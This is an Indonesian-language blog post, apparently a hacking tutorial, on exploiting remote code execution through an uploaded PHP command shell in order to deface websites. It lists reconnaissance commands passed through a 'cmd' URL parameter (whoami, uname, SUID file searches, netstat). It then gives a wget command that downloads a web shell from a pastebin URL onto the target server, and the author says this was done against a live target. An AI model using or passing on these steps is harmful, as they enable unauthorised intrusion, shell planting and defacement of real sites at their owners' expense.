Post

9/recent/ticker-posts

The rce method and the basic deface rce

 


beberapa basic rce dan command up shell dengan memanfaatkan bug rce.

Basic For Remote Code Execution ( RCE )

merupakan suatu teknik serangan pada website dengan cara mengeksekusi kode berbahaya dan mengambil alih kendali akses ke sistem komputer. attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi. Remote Command Execution (RCE) atau Remote Arbitary Command Execution (ACE) adalah bug yg memungkinkan attacker untuk menjalankan command secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi. 

Nah request dari php ini adalah cmd.
Misalnya gua up file bernama test.php, request dari php yang tadi saya upload adalah cmd. 

Bagaimana cara kita akses? 

http://site.com/test.php?cmd=

Di sini kita coba menjalankan beberapa perintah dasar rce. 

  • http://site.com/test.php?cmd=ls
  • http://site.com/test.php?cmd=whoami
  • http://site.com/test.php?cmd=uname -a
  • http://site.com/test.php?cmd=pwd
  • http://site.com/test.php?cmd=ps aux
  • http://site.com/test.php?cmd=ls -la
  • http://site.com/test.php?cmd=netstat -an | grep -i listen
  • http://site.com/test.php?cmd=lsattr -va
  • http://site.com/test.php?cmd=find / -type f -perm -04000 -ls
  • http://site.com/test.php?cmd=netstat -an | grep -i listen
  • http://site.com/test.php?cmd=find / -type f -perm - 02000 -ls

Oke coba kita up shell menggunakan command wget

Bagaimana cara up shell menggunakan command wget ini?

http://site.com/test.php?cmd=wget https://pastebin.com/raw/ntq2g95Z -O yo.php

---------------------------------------------------------------

yo.php -> nama shell saya

https://pastebin.com/raw/ntq2g95Z -> Shell pastebin

---------------------------------------------------------------

Oke jadi di sini saya sudah mempunyai live target jadi langsung aja ya saya perlihatkan..

---------------------------------------------------------------



Nah kan ke upload :D

Cara akses nya gimana?

------------------------------------------------

http://site.com/namashell.php

------------------------------------------------

Oke saya rasa cukup dan sampai sini aja yaa.. Byeee

Posting Komentar

0 Komentar